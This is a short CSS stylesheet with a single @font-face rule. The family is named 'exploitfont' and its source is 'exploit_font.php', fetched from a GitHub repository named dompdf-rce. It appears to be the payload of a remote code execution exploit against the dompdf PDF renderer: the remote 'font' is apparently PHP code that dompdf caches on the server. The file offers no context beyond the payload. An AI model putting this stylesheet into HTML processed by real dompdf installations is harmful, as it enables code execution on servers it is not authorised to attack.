@font-face {
    font-family: 'exploitfont';
    src: url('https://github.com/positive-security/dompdf-rce/raw/refs/heads/main/exploit/exploit_font.php');
    font-style: normal;
    font-weight: normal;
}



